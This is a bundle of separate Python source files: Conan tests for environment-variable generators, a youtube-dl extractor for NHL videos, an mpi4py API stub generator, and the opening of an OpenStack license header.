openssl = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
settings = "os"
def package_info(self):
self.buildenv_info.append("OpenSSL_ROOT",
"MyOpenSSL{}Value".format(self.settings.os))
""")
poco = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
requires = "openssl/1.0"
settings = "os"
def package_info(self):
self.buildenv_info.append("Poco_ROOT", "MyPoco{}Value".format(self.settings.os))
""")
client = TestClient()
client.save({"poco/conanfile.py": poco,
"openssl/conanfile.py": openssl})
client.run("export openssl openssl/1.0@")
client.run("export poco poco/1.0@")
consumer = textwrap.dedent(r"""
from conans import ConanFile
from conan.tools.env import VirtualBuildEnv
class Pkg(ConanFile):
requires = "poco/1.0"
def generate(self):
buildenv = VirtualBuildEnv(self).vars()
self.output.info("BUILDENV POCO: {}!!!".format(buildenv.get("Poco_ROOT")))
self.output.info("BUILDENV OpenSSL: {}!!!".format(buildenv.get("OpenSSL_ROOT")))
""")
client.save({"conanfile.py": consumer}, clean_first=True)
client.run("install . -s:b os=Windows -s:h os=Linux --build -g VirtualBuildEnv")
assert "BUILDENV POCO: MyPocoLinuxValue!!!" in client.out
assert "BUILDENV OpenSSL: MyOpenSSLLinuxValue!!!" in client.out
def test_diamond_repeated():
pkga = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
def package_info(self):
self.runenv_info.define("MYVAR1", "PkgAValue1")
self.runenv_info.append("MYVAR2", "PkgAValue2")
self.runenv_info.prepend("MYVAR3", "PkgAValue3")
self.runenv_info.prepend("MYVAR4", "PkgAValue4")
""")
pkgb = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
requires = "pkga/1.0"
def package_info(self):
self.runenv_info.append("MYVAR1", "PkgBValue1")
self.runenv_info.append("MYVAR2", "PkgBValue2")
self.runenv_info.prepend("MYVAR3", "PkgBValue3")
self.runenv_info.prepend("MYVAR4", "PkgBValue4")
""")
pkgc = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
requires = "pkga/1.0"
def package_info(self):
self.runenv_info.append("MYVAR1", "PkgCValue1")
self.runenv_info.append("MYVAR2", "PkgCValue2")
self.runenv_info.prepend("MYVAR3", "PkgCValue3")
self.runenv_info.prepend("MYVAR4", "PkgCValue4")
""")
pkgd = textwrap.dedent(r"""
from conans import ConanFile
class Pkg(ConanFile):
requires = "pkgb/1.0", "pkgc/1.0"
def package_info(self):
self.runenv_info.append("MYVAR1", "PkgDValue1")
self.runenv_info.append("MYVAR2", "PkgDValue2")
self.runenv_info.prepend("MYVAR3", "PkgDValue3")
self.runenv_info.define("MYVAR4", "PkgDValue4")
""")
pkge = textwrap.dedent(r"""
from conans import ConanFile
from conan.tools.env import VirtualRunEnv
class Pkg(ConanFile):
requires = "pkgd/1.0"
def generate(self):
env = VirtualRunEnv(self)
runenv = env.vars(scope="run")
self.output.info("MYVAR1: {}!!!".format(runenv.get("MYVAR1")))
self.output.info("MYVAR2: {}!!!".format(runenv.get("MYVAR2")))
self.output.info("MYVAR3: {}!!!".format(runenv.get("MYVAR3")))
self.output.info("MYVAR4: {}!!!".format(runenv.get("MYVAR4")))
""")
client = TestClient()
client.save({"pkga/conanfile.py": pkga,
"pkgb/conanfile.py": pkgb,
"pkgc/conanfile.py": pkgc,
"pkgd/conanfile.py": pkgd,
"pkge/conanfile.py": pkge})
client.run("export pkga pkga/1.0@")
client.run("export pkgb pkgb/1.0@")
client.run("export pkgc pkgc/1.0@")
client.run("export pkgd pkgd/1.0@")
client.run("install pkge --build")
assert "MYVAR1: PkgAValue1 PkgCValue1 PkgBValue1 PkgDValue1!!!" in client.out
assert "MYVAR2: PkgAValue2 PkgCValue2 PkgBValue2 PkgDValue2!!!" in client.out
assert "MYVAR3: PkgDValue3 PkgBValue3 PkgCValue3 PkgAValue3!!!" in client.out
assert "MYVAR4: PkgDValue4!!!" in client.out
def test_environment_scripts_generated_envvars():
consumer_pkg = textwrap.dedent(r"""
from conans import ConanFile
from conan.tools.env import VirtualBuildEnv, VirtualRunEnv
class Pkg(ConanFile):
settings = "os"
requires = "require_pkg/1.0"
build_requires = "build_require_pkg/1.0"
generators = "VirtualRunEnv", "VirtualBuildEnv"
""")
client = TestClient()
conanfile = (GenConanfile().with_package_file("bin/myapp", "myexe")
.with_package_file("lib/mylib", "mylibcontent")
.with_settings("os"))
client.save({"build_require_pkg/conanfile.py": conanfile,
"require_pkg/conanfile.py": conanfile,
"consumer_pkg/conanfile.py": consumer_pkg})
client.run("export build_require_pkg build_require_pkg/1.0@")
client.run("export require_pkg require_pkg/1.0@")
client.run("install consumer_pkg --build")
if platform.system() == "Windows":
conanbuildenv = client.load("conanbuildenv.bat")
conanrunenv = client.load("conanrunenv.bat")
assert "LD_LIBRARY_PATH" not in conanbuildenv
assert "LD_LIBRARY_PATH" not in conanrunenv
else:
conanbuildenv = client.load("conanbuildenv.sh")
conanrunenv = client.load("conanrunenv.sh")
assert "LD_LIBRARY_PATH" in conanbuildenv
assert "LD_LIBRARY_PATH" in conanrunenv
# Build context LINUX - Host context LINUX
client.run("install consumer_pkg -s:b os=Linux -s:h os=Linux --build")
conanbuildenv = client.load("conanbuildenv.sh")
conanrunenv = client.load("conanrunenv.sh")
assert "LD_LIBRARY_PATH" in conanbuildenv
assert "LD_LIBRARY_PATH" in conanrunenv
# Build context WINDOWS - Host context WINDOWS
client.run("install consumer_pkg -s:b os=Windows -s:h os=Windows --build")
conanbuildenv = client.load("conanbuildenv.bat")
conanrunenv = client.load("conanrunenv.bat")
assert "LD_LIBRARY_PATH" not in conanbuildenv
assert "LD_LIBRARY_PATH" not in conanrunenv
# Build context LINUX - Host context WINDOWS
client.run("install consumer_pkg -s:b os=Linux -s:h os=Windows --build")
conanbuildenv = client.load("conanbuildenv.sh")
conanrunenv = client.load("conanrunenv.bat")
assert "LD_LIBRARY_PATH" in conanbuildenv
assert "LD_LIBRARY_PATH" not in conanrunenv
# Build context WINDOWS - Host context LINUX
client.run("install consumer_pkg -s:b os=Windows -s:h os=Linux --build")
conanbuildenv = client.load("conanbuildenv.bat")
conanrunenv = client.load("conanrunenv.sh")
assert "LD_LIBRARY_PATH" not in conanbuildenv
assert "LD_LIBRARY_PATH" in conanrunenv
def test_multiple_deactivate():
conanfile = textwrap.dedent(r"""
from conans import ConanFile
from conan.tools.env import Environment
class Pkg(ConanFile):
def generate(self):
e1 = Environment()
e1.define("VAR1", "Value1")
e1.vars(self).save_script("mybuild1")
e2 = Environment()
e2.define("VAR2", "Value2")
e2.vars(self).save_script("mybuild2")
""")
display_bat = textwrap.dedent("""\
@echo off
echo VAR1=%VAR1%!!
echo VAR2=%VAR2%!!
""")
display_sh = textwrap.dedent("""\
echo VAR1=$VAR1!!
echo VAR2=$VAR2!!
""")
client = TestClient()
client.save({"conanfile.py": conanfile,
"display.bat": display_bat,
"display.sh": display_sh})
os.chmod(os.path.join(client.current_folder, "display.sh"), 0o777)
client.run("install .")
if platform.system() == "Windows":
cmd = "conanbuild.bat && display.bat && deactivate_conanbuild.bat && display.bat"
else:
cmd = '. ./conanbuild.sh && ./display.sh && . ./deactivate_conanbuild.sh && ./display.sh'
out, _ = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
shell=True, cwd=client.current_folder).communicate()
out = out.decode()
assert "VAR1=Value1!!" in out
assert "VAR2=Value2!!" in out
assert 2 == str(out).count("Restoring environment")
assert "VAR1=!!" in out
assert "VAR2=!!" in out
def test_profile_build_env_spaces():
display_bat = textwrap.dedent("""\
@echo off
echo VAR1=%VAR1%!!
""")
display_sh = textwrap.dedent("""\
echo VAR1=$VAR1!!
""")
client = TestClient()
client.save({"conanfile.txt": "",
"profile": "[buildenv]\nVAR1 = VALUE1",
"display.bat": display_bat,
"display.sh": display_sh})
os.chmod(os.path.join(client.current_folder, "display.sh"), 0o777)
client.run("install . -g VirtualBuildEnv -pr=profile")
if platform.system() == "Windows":
cmd = "conanbuild.bat && display.bat && deactivate_conanbuild.bat && display.bat"
else:
cmd = '. ./conanbuild.sh && ./display.sh && . ./deactivate_conanbuild.sh && ./display.sh'
out, _ = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
shell=True, cwd=client.current_folder).communicate()
out = out.decode()
assert "VAR1= VALUE1!!" in out
assert "Restoring environment" in out
assert "VAR1=!!" in out
def test_deactivate_location():
conanfile = textwrap.dedent(r"""
from conans import ConanFile
from conan.tools.env import Environment
class Pkg(ConanFile):
def package_info(self):
self.buildenv_info.define("FOO", "BAR")
""")
client = TestClient()
client.save({"pkg.py": conanfile})
client.run("create pkg.py pkg/1.0@")
client.run("install pkg/1.0@ -g VirtualBuildEnv --install-folder=myfolder -s build_type=Release -s arch=x86_64")
source_cmd, script_ext = ("myfolder\\", ".bat") if platform.system() == "Windows" else (". ./myfolder/", ".sh")
cmd = "{}conanbuild{}".format(source_cmd, script_ext)
subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True,
cwd=client.current_folder).communicate()
assert not os.path.exists(os.path.join(client.current_folder,
"deactivate_conanbuildenv-release-x86_64{}".format(script_ext)))
assert os.path.exists(os.path.join(client.current_folder, "myfolder",
"deactivate_conanbuildenv-release-x86_64{}".format(script_ext)))
|
|
from __future__ import unicode_literals
import re
import json
import os
from .common import InfoExtractor
from ..compat import (
compat_urlparse,
compat_urllib_parse_urlencode,
compat_urllib_parse_urlparse,
compat_str,
)
from ..utils import (
unified_strdate,
determine_ext,
int_or_none,
parse_iso8601,
parse_duration,
)
class NHLBaseInfoExtractor(InfoExtractor):
@staticmethod
def _fix_json(json_string):
return json_string.replace('\\\'', '\'')
def _real_extract_video(self, video_id):
vid_parts = video_id.split(',')
if len(vid_parts) == 3:
video_id = '%s0%s%s-X-h' % (vid_parts[0][:4], vid_parts[1], vid_parts[2].rjust(4, '0'))
json_url = 'http://video.nhl.com/videocenter/servlets/playlist?ids=%s&format=json' % video_id
data = self._download_json(
json_url, video_id, transform_source=self._fix_json)
return self._extract_video(data[0])
def _extract_video(self, info):
video_id = info['id']
self.report_extraction(video_id)
initial_video_url = info['publishPoint']
if info['formats'] == '1':
parsed_url = compat_urllib_parse_urlparse(initial_video_url)
filename, ext = os.path.splitext(parsed_url.path)
path = '%s_sd%s' % (filename, ext)
data = compat_urllib_parse_urlencode({
'type': 'fvod',
'path': compat_urlparse.urlunparse(parsed_url[:2] + (path,) + parsed_url[3:])
})
path_url = 'http://video.nhl.com/videocenter/servlets/encryptvideopath?' + data
path_doc = self._download_xml(
path_url, video_id, 'Downloading final video url')
video_url = path_doc.find('path').text
else:
video_url = initial_video_url
join = compat_urlparse.urljoin
ret = {
'id': video_id,
'title': info['name'],
'url': video_url,
'description': info['description'],
'duration': int(info['duration']),
'thumbnail': join(join(video_url, '/u/'), info['bigImage']),
'upload_date': unified_strdate(info['releaseDate'].split('.')[0]),
}
if video_url.startswith('rtmp:'):
mobj = re.match(r'(?P<tc_url>rtmp://[^/]+/(?P<app>[a-z0-9/]+))/(?P<play_path>mp4:.*)', video_url)
ret.update({
'tc_url': mobj.group('tc_url'),
'play_path': mobj.group('play_path'),
'app': mobj.group('app'),
'no_resume': True,
})
return ret
class NHLVideocenterIE(NHLBaseInfoExtractor):
IE_NAME = 'nhl.com:videocenter'
_VALID_URL = r'https?://video(?P<team>\.[^.]*)?\.nhl\.com/videocenter/(?:console|embed)?(?:\?(?:.*?[?&])?)(?:id|hlg|playlist)=(?P<id>[-0-9a-zA-Z,]+)'
_TESTS = [{
'url': 'http://video.canucks.nhl.com/videocenter/console?catid=6?id=453614',
'md5': 'db704a4ea09e8d3988c85e36cc892d09',
'info_dict': {
'id': '453614',
'ext': 'mp4',
'title': 'Quick clip: Weise 4-3 goal vs Flames',
'description': 'Dale Weise scores his first of the season to put the Canucks up 4-3.',
'duration': 18,
'upload_date': '20131006',
},
}, {
'url': 'http://video.nhl.com/videocenter/console?id=2014020024-628-h',
'md5': 'd22e82bc592f52d37d24b03531ee9696',
'info_dict': {
'id': '2014020024-628-h',
'ext': 'mp4',
'title': 'Alex Galchenyuk Goal on Ray Emery (14:40/3rd)',
'description': 'Home broadcast - Montreal Canadiens at Philadelphia Flyers - October 11, 2014',
'duration': 0,
'upload_date': '20141011',
},
}, {
'url': 'http://video.mapleleafs.nhl.com/videocenter/console?id=58665&catid=802',
'md5': 'c78fc64ea01777e426cfc202b746c825',
'info_dict': {
'id': '58665',
'ext': 'flv',
'title': 'Classic Game In Six - April 22, 1979',
'description': 'It was the last playoff game for the Leafs in the decade, and the last time the Leafs and Habs played in the playoffs. Great game, not a great ending.',
'duration': 400,
'upload_date': '20100129'
},
}, {
'url': 'http://video.flames.nhl.com/videocenter/console?id=630616',
'only_matching': True,
}, {
'url': 'http://video.nhl.com/videocenter/?id=736722',
'only_matching': True,
}, {
'url': 'http://video.nhl.com/videocenter/console?hlg=20142015,2,299&lang=en',
'md5': '076fcb88c255154aacbf0a7accc3f340',
'info_dict': {
'id': '2014020299-X-h',
'ext': 'mp4',
'title': 'Penguins at Islanders / Game Highlights',
'description': 'Home broadcast - Pittsburgh Penguins at New York Islanders - November 22, 2014',
'duration': 268,
'upload_date': '20141122',
}
}, {
'url': 'http://video.oilers.nhl.com/videocenter/console?id=691469&catid=4',
'info_dict': {
'id': '691469',
'ext': 'mp4',
'title': 'RAW | Craig MacTavish Full Press Conference',
'description': 'Oilers GM Craig MacTavish addresses the media at Rexall Place on Friday.',
'upload_date': '20141205',
},
'params': {
'skip_download': True, # Requires rtmpdump
}
}, {
'url': 'http://video.nhl.com/videocenter/embed?playlist=836127',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
return self._real_extract_video(video_id)
class NHLNewsIE(NHLBaseInfoExtractor):
IE_NAME = 'nhl.com:news'
IE_DESC = 'NHL news'
_VALID_URL = r'https?://(?:.+?\.)?nhl\.com/(?:ice|club)/news\.html?(?:\?(?:.*?[?&])?)id=(?P<id>[-0-9a-zA-Z]+)'
_TESTS = [{
'url': 'http://www.nhl.com/ice/news.htm?id=750727',
'md5': '4b3d1262e177687a3009937bd9ec0be8',
'info_dict': {
'id': '736722',
'ext': 'mp4',
'title': 'Cal Clutterbuck has been fined $2,000',
'description': 'md5:45fe547d30edab88b23e0dd0ab1ed9e6',
'duration': 37,
'upload_date': '20150128',
},
}, {
# iframe embed
'url': 'http://sabres.nhl.com/club/news.htm?id=780189',
'md5': '9f663d1c006c90ac9fb82777d4294e12',
'info_dict': {
'id': '836127',
'ext': 'mp4',
'title': 'Morning Skate: OTT vs. BUF (9/23/15)',
'description': "Brian Duff chats with Tyler Ennis prior to Buffalo's first preseason home game.",
'duration': 93,
'upload_date': '20150923',
},
}]
def _real_extract(self, url):
news_id = self._match_id(url)
webpage = self._download_webpage(url, news_id)
video_id = self._search_regex(
[r'pVid(\d+)', r"nlid\s*:\s*'(\d+)'",
r'<iframe[^>]+src=["\']https?://video.*?\.nhl\.com/videocenter/embed\?.*\bplaylist=(\d+)'],
webpage, 'video id')
return self._real_extract_video(video_id)
class NHLVideocenterCategoryIE(NHLBaseInfoExtractor):
IE_NAME = 'nhl.com:videocenter:category'
IE_DESC = 'NHL videocenter category'
_VALID_URL = r'https?://video\.(?P<team>[^.]*)\.nhl\.com/videocenter/(console\?[^(id=)]*catid=(?P<catid>[0-9]+)(?![&?]id=).*?)?$'
_TEST = {
'url': 'http://video.canucks.nhl.com/videocenter/console?catid=999',
'info_dict': {
'id': '999',
'title': 'Highlights',
},
'playlist_count': 12,
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
team = mobj.group('team')
webpage = self._download_webpage(url, team)
cat_id = self._search_regex(
[r'var defaultCatId = "(.+?)";',
r'{statusIndex:0,index:0,.*?id:(.*?),'],
webpage, 'category id')
playlist_title = self._html_search_regex(
r'tab0"[^>]*?>(.*?)</td>',
webpage, 'playlist title', flags=re.DOTALL).lower().capitalize()
data = compat_urllib_parse_urlencode({
'cid': cat_id,
# This is the default value
'count': 12,
'ptrs': 3,
'format': 'json',
})
path = '/videocenter/servlets/browse?' + data
request_url = compat_urlparse.urljoin(url, path)
response = self._download_webpage(request_url, playlist_title)
response = self._fix_json(response)
if not response.strip():
self._downloader.report_warning('Got an empty response, trying '
'adding the "newvideos" parameter')
response = self._download_webpage(request_url + '&newvideos=true',
playlist_title)
response = self._fix_json(response)
videos = json.loads(response)
return {
'_type': 'playlist',
'title': playlist_title,
'id': cat_id,
'entries': [self._extract_video(v) for v in videos],
}
class NHLIE(InfoExtractor):
IE_NAME = 'nhl.com'
_VALID_URL = r'https?://(?:www\.)?(?P<site>nhl|wch2016)\.com/(?:[^/]+/)*c-(?P<id>\d+)'
_SITES_MAP = {
'nhl': 'nhl',
'wch2016': 'wch',
}
_TESTS = [{
# type=video
'url': 'https://www.nhl.com/video/anisimov-cleans-up-mess/t-277752844/c-43663503',
'md5': '0f7b9a8f986fb4b4eeeece9a56416eaf',
'info_dict': {
'id': '43663503',
'ext': 'mp4',
'title': 'Anisimov cleans up mess',
'description': 'md5:a02354acdfe900e940ce40706939ca63',
'timestamp': 1461288600,
'upload_date': '20160422',
},
}, {
# type=article
'url': 'https://www.nhl.com/news/dennis-wideman-suspended/c-278258934',
'md5': '1f39f4ea74c1394dea110699a25b366c',
'info_dict': {
'id': '40784403',
'ext': 'mp4',
'title': 'Wideman suspended by NHL',
'description': 'Flames defenseman Dennis Wideman was banned 20 games for violation of Rule 40 (Physical Abuse of Officials)',
'upload_date': '20160204',
'timestamp': 1454544904,
},
}, {
'url': 'https://www.wch2016.com/video/caneur-best-of-game-2-micd-up/t-281230378/c-44983703',
'only_matching': True,
}, {
'url': 'https://www.wch2016.com/news/3-stars-team-europe-vs-team-canada/c-282195068',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
tmp_id, site = mobj.group('id'), mobj.group('site')
video_data = self._download_json(
'https://nhl.bamcontent.com/%s/id/v1/%s/details/web-v1.json'
% (self._SITES_MAP[site], tmp_id), tmp_id)
if video_data.get('type') == 'article':
video_data = video_data['media']
video_id = compat_str(video_data['id'])
title = video_data['title']
formats = []
for playback in video_data.get('playbacks', []):
playback_url = playback.get('url')
if not playback_url:
continue
ext = determine_ext(playback_url)
if ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
playback_url, video_id, 'mp4', 'm3u8_native',
m3u8_id=playback.get('name', 'hls'), fatal=False))
else:
height = int_or_none(playback.get('height'))
formats.append({
'format_id': playback.get('name', 'http' + ('-%dp' % height if height else '')),
'url': playback_url,
'width': int_or_none(playback.get('width')),
'height': height,
})
self._sort_formats(formats, ('preference', 'width', 'height', 'tbr', 'format_id'))
thumbnails = []
for thumbnail_id, thumbnail_data in video_data.get('image', {}).get('cuts', {}).items():
thumbnail_url = thumbnail_data.get('src')
if not thumbnail_url:
continue
thumbnails.append({
'id': thumbnail_id,
'url': thumbnail_url,
'width': int_or_none(thumbnail_data.get('width')),
'height': int_or_none(thumbnail_data.get('height')),
})
return {
'id': video_id,
'title': title,
'description': video_data.get('description'),
'timestamp': parse_iso8601(video_data.get('date')),
'duration': parse_duration(video_data.get('duration')),
'thumbnails': thumbnails,
'formats': formats,
}
|
|
import os
import sys
import inspect
from textwrap import dedent
from textwrap import indent
def is_function(obj):
return inspect.isbuiltin(obj) or type(obj) is type(ord)
def is_method(obj):
return inspect.ismethoddescriptor(obj) or type(obj) in (
type(str.index),
type(str.__add__),
type(str.__new__),
)
def is_classmethod(obj):
return inspect.isbuiltin(obj) or type(obj).__name__ in (
'classmethod',
'classmethod_descriptor',
)
def is_staticmethod(obj):
return type(obj).__name__ in (
'staticmethod',
)
def is_datadescr(obj):
return inspect.isdatadescriptor(obj) and not hasattr(obj, 'fget')
def is_property(obj):
return inspect.isdatadescriptor(obj) and hasattr(obj, 'fget')
def is_class(obj):
return inspect.isclass(obj) or type(obj) is type(int)
class Lines(list):
INDENT = " " * 4
level = 0
@property
def add(self):
return self
@add.setter
def add(self, lines):
if lines is None:
return
if isinstance(lines, str):
lines = dedent(lines).strip().split("\n")
indent = self.INDENT * self.level
for line in lines:
self.append(indent + line)
def signature(obj):
doc = obj.__doc__
sig = doc.split('\n', 1)[0].split('.', 1)[-1]
return sig
def docstring(obj):
doc = obj.__doc__
doc = doc.split('\n', 1)[1]
doc = dedent(doc).strip()
doc = f'"""{doc}"""'
doc = indent(doc, Lines.INDENT)
return doc
def apidoc_constant(constant):
name, value = constant
typename = type(value).__name__
init = f"_def({typename}, '{name}')"
doc = f"#: :class:`{typename}` ``{name}``"
return f"{name}: {typename} = {init} {doc}\n"
def apidoc_function(function):
sig = signature(function)
doc = docstring(function)
body = Lines.INDENT + "..."
return f"def {sig}:\n{doc}\n{body}\n"
def apidoc_method(method):
sig = signature(method)
doc = docstring(method)
body = Lines.INDENT + "..."
return f"def {sig}:\n{doc}\n{body}\n"
def apidoc_datadescr(datadescr, name=None):
sig = signature(datadescr)
doc = docstring(datadescr)
name = sig.split(':')[0].strip()
type = sig.split(':')[1].strip()
sig = f"{name}(self) -> {type}"
body = Lines.INDENT + "..."
return f"@property\ndef {sig}:\n{doc}\n{body}\n"
def apidoc_property(prop, name=None):
sig = signature(prop.fget)
name = name or prop.fget.__name__
type = sig.rsplit('->', 1)[-1].strip()
sig = f"{name}(self) -> {type}"
doc = f'"""{prop.__doc__}"""'
doc = indent(doc, Lines.INDENT)
body = Lines.INDENT + "..."
return f"@property\ndef {sig}:\n{doc}\n{body}\n"
def apidoc_constructor(cls, name='__init__'):
init = (name == '__init__')
argname = cls.__mro__[-2].__name__.lower()
argtype = cls.__name__
initarg = f"{argname}: Optional[{argtype}] = None"
selfarg = 'self' if init else 'cls'
rettype = 'None' if init else argtype
arglist = f"{selfarg}, {initarg}"
sig = f"{name}({arglist}) -> {rettype}"
ret = '...' if init else 'return super().__new__(cls)'
body = Lines.INDENT + ret
return f"def {sig}:\n{body}"
def apidoc_class(cls, done=None):
skip = {
'__doc__',
'__module__',
'__weakref__',
'__pyx_vtable__',
'__lt__',
'__le__',
'__ge__',
'__gt__',
}
special = {
'__len__': "__len__(self) -> int",
'__bool__': "__bool__(self) -> bool",
'__hash__': "__hash__(self) -> int",
'__int__': "__int__(self) -> int",
'__index__': "__int__(self) -> int",
'__str__': "__str__(self) -> str",
'__repr__': "__repr__(self) -> str",
'__eq__': "__eq__(self, other: Any) -> bool",
'__ne__': "__ne__(self, other: Any) -> bool",
}
constructor = {
'__new__',
'__init__',
}
override = OVERRIDE.get(cls.__name__, {})
done = set() if done is None else done
lines = Lines()
base = cls.__base__
if base is object:
lines.add = f"class {cls.__name__}:"
else:
lines.add = f"class {cls.__name__}({base.__name__}):"
lines.level += 1
doc = cls.__doc__
doc = dedent(doc).strip()
if doc.startswith(f"{cls.__name__}("):
doc = doc.split('\n', 1)[1].strip()
lines.add = f'"""{doc}"""'
for name in constructor:
if name in override:
done.update(constructor)
lines.add = override[name]
break
for name in constructor:
if name in done:
break
if name in cls.__dict__:
done.update(constructor)
lines.add = apidoc_constructor(cls, name)
break
if '__hash__' in cls.__dict__:
if cls.__hash__ is None:
done.add('__hash__')
dct = cls.__dict__
keys = list(dct.keys())
for name in keys:
if name in done:
continue
if name in skip:
continue
if name in override:
done.add(name)
lines.add = override[name]
continue
if name in special:
done.add(name)
sig = special[name]
lines.add = f"def {sig}: ..."
continue
if name in constructor:
done.update(constructor)
lines.add = apidoc_constructor(cls)
continue
attr = getattr(cls, name)
if is_method(attr):
done.add(name)
if name == attr.__name__:
obj = dct[name]
if is_classmethod(obj):
lines.add = f"@classmethod"
elif is_staticmethod(obj):
lines.add = f"@staticmethod"
lines.add = apidoc_method(attr)
elif False:
lines.add = f"{name} = {attr.__name__}"
continue
if is_datadescr(attr):
done.add(name)
lines.add = apidoc_datadescr(attr)
continue
if is_property(attr):
done.add(name)
lines.add = apidoc_property(attr, name)
continue
leftovers = [name for name in keys if
name not in done and name not in skip]
assert not leftovers, f"leftovers: {leftovers}"
lines.level -= 1
return lines
def apidoc_module(module, done=None):
skip = {
'__doc__',
'__name__',
'__loader__',
'__spec__',
'__file__',
'__package__',
'__builtins__',
'__pyx_capi__',
}
done = set() if done is None else done
lines = Lines()
keys = list(module.__dict__.keys())
keys.sort(key=lambda name: name.startswith("_"))
constants = [
(name, getattr(module, name)) for name in keys
if all((
name not in done and name not in skip,
isinstance(getattr(module, name), int),
))
]
for _, value in constants:
cls = type(value)
name = cls.__name__
if name in done or name in skip:
continue
if cls.__module__ == module.__name__:
done.add(name)
lines.add = apidoc_class(cls)
lines.add = ""
for name, value in constants:
done.add(name)
if name in OVERRIDE:
lines.add = OVERRIDE[name]
else:
lines.add = apidoc_constant((name, value))
if constants:
lines.add = ""
for name in keys:
if name in done or name in skip:
continue
value = getattr(module, name)
if is_class(value):
done.add(name)
lines.add = apidoc_class(value)
lines.add = ""
instances = [
(k, getattr(module, k)) for k in keys
if all((
k not in done and k not in skip,
type(getattr(module, k)) is value,
))
]
for attrname, attrvalue in instances:
done.add(attrname)
lines.add = apidoc_constant((attrname, attrvalue))
if instances:
lines.add = ""
continue
if is_function(value):
done.add(name)
if name == value.__name__:
lines.add = apidoc_function(value)
else:
lines.add = f"{name} = {value.__name__}"
continue
lines.add = ""
for name in keys:
if name in done or name in skip:
continue
value = getattr(module, name)
done.add(name)
if name in OVERRIDE:
lines.add = OVERRIDE[name]
else:
lines.add = apidoc_constant((name, value))
leftovers = [name for name in keys if
name not in done and name not in skip]
assert not leftovers, f"leftovers: {leftovers}"
return lines
IMPORTS = """
from __future__ import annotations
"""
HELPERS = """
class _Int(int): pass
def _repr(obj):
try:
return obj._name
except AttributeError:
return super(obj).__repr__()
def _def(cls, name):
if cls is int:
cls = _Int
obj = cls()
if cls.__name__ in ('Pickle', 'memory'):
return obj
obj._name = name
if '__repr__' not in cls.__dict__:
cls.__repr__ = _repr
return obj
"""
OVERRIDE = {
'Exception': {
'__new__': (
"def __new__(cls, ierr: int = SUCCESS) -> Exception:\n"
" return super().__new__(cls, ierr)"),
"__lt__": "def __lt__(self, other: int) -> bool: ...",
"__le__": "def __le__(self, other: int) -> bool: ...",
"__gt__": "def __gt__(self, other: int) -> bool: ...",
"__ge__": "def __ge__(self, other: int) -> bool: ...",
},
'Info': {
'__iter__':
"def __iter__(self) -> Iterator[str]: ...",
'__getitem__':
"def __getitem__(self, item: str) -> str: ...",
'__setitem__':
"def __setitem__(self, item: str, value: str) -> None: ...",
'__delitem__':
"def __delitem__(self, item: str) -> None: ...",
'__contains__':
"def __contains__(self, value: str) -> bool: ...",
},
'Op': {
'__call__': "def __call__(self, x: Any, y: Any) -> Any: ...",
},
'memory': {
'__new__': (
"def __new__(cls, buf: Buffer) -> memory:\n"
" return super().__new__(cls)"),
'__getitem__': (
"def __getitem__(self, "
"item: Union[int, slice]) "
"-> Union[int, memory]: ..."),
'__setitem__': (
"def __setitem__(self, "
"item: Union[int, slice], "
"value: Union[int, Buffer]) "
"-> None: ..."),
'__delitem__': None,
},
'Pickle': {
'__init__': """
def __init__(self,
dumps: Optional[Callable[[Any, int], bytes]] = None,
loads: Optional[Callable[[Buffer], Any]] = None,
protocol: Optional[int] = None,
) -> None: ...
"""
},
'_typedict': "_typedict: Dict[str, Datatype] = {}",
'_typedict_c': "_typedict_c: Dict[str, Datatype] = {}",
'_typedict_f': "_typedict_f: Dict[str, Datatype] = {}",
'_keyval_registry': None,
}
ConstantTypes = (
'BottomType',
'InPlaceType',
)
for cls in ConstantTypes:
OVERRIDE[cls] = {
'__new__': (
f"def __new__(cls) -> {cls}:\n"
f" return super().__new__({cls})"),
'__repr__': "def __repr__(self) -> str: return self._name",
}
TYPING = """
from typing import (
Any,
Union,
Literal,
Optional,
NoReturn,
Final,
)
from typing import (
Callable,
Hashable,
Iterable,
Iterator,
Sequence,
Mapping,
)
from typing import (
Tuple,
List,
Dict,
)
from .typing import *
"""
def apidoc_mpi4py_MPI(done=None):
from mpi4py import MPI
lines = Lines()
lines.add = f'"""{MPI.__doc__}"""'
lines.add = IMPORTS
lines.add = ""
lines.add = HELPERS
lines.add = ""
lines.add = apidoc_module(MPI)
lines.add = ""
lines.add = TYPING
return lines
def generate(filename):
dirname = os.path.dirname(filename)
os.makedirs(dirname, exist_ok=True)
with open(filename, 'w') as f:
for line in apidoc_mpi4py_MPI():
print(line, file=f)
def load_module(filename, name=None):
if name is None:
name, _ = os.path.splitext(
os.path.basename(filename))
module = type(sys)(name)
module.__file__ = filename
module.__package__ = name.rsplit('.', 1)[0]
with open(filename) as f:
exec(f.read(), module.__dict__)
return module
_sys_modules = {}
def replace_module(module):
name = module.__name__
assert name not in _sys_modules
_sys_modules[name] = sys.modules[name]
sys.modules[name] = module
def restore_module(module):
name = module.__name__
assert name in _sys_modules
sys.modules[name] = _sys_modules[name]
def annotate(dest, source):
try:
dest.__annotations__ = source.__annotations__
except Exception:
pass
if isinstance(dest, type):
for name in dest.__dict__.keys():
if hasattr(source, name):
obj = getattr(dest, name)
annotate(obj, getattr(source, name))
if isinstance(dest, type(sys)):
for name in dir(dest):
if hasattr(source, name):
obj = getattr(dest, name)
mod = getattr(obj, '__module__', None)
if dest.__name__ == mod:
annotate(obj, getattr(source, name))
OUTDIR = 'reference'
if __name__ == '__main__':
generate(os.path.join(OUTDIR, 'mpi4py.MPI.py'))
|
|
# Copyright 2010-2011 OpenStack Foundation
# Copyright 2012-2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
